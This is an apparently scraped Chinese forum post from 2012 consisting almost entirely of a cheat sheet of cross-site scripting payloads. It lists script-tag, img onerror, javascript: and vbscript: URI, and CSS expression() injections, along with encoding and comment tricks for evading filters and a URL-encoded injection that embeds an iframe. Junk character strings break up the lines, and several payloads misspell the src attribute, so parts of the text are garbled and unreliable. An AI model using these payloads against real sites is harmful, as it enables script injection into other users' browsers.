<script>alert("跨站")</script> (最常用)
( V& x% ?: H+ C! M/ k# x! L4 q<img scr=javascript:alert("跨站")></img>6 w, _, J3 k/ r
<img scr="javascript: alert(/跨站/)></img>) s/ q' p- x3 i- r
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)( w# q& k J2 o: h
<img scr="#" onerror=alert(/跨站/)></img>) C# {/ O, e4 R: ^0 T7 M
<img scr="#" style="xss:expression(alert(/xss/));"></img>
a/ l: Z% q5 a( x) e; K<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)2 l; f3 H* \3 j8 H: ^% d
<img src=vbscript:msgbox ("xss")></img>
( s% K. W2 ]5 c5 g<style> input {left:expression (alert('xss'))}</style>0 o, Z, _6 _) A1 F
<div style={left:expression (alert('xss'))}></div> U5 l% A! T( @! q# n: O
<div style={left:exp/* */ression (alert('xss'))}></div>
4 J; N% }# e# ]3 P* P" g<div style={left:\0065\0078ression (alert('xss'))}></div>+ b8 @5 Y6 }( }& E* p
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>" a1 f/ V% W/ p2 n& R7 B& ]
unicode <div style="{left:expRessioN (alert('xss'))}">
4 }0 N! d. I, F" Z+ _4 h
8 E1 {+ D. @5 V* `+ X"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["& }: f2 k9 y9 C$ Z
|
发表于 2012-9-15 14:09:13
收藏
支持
反对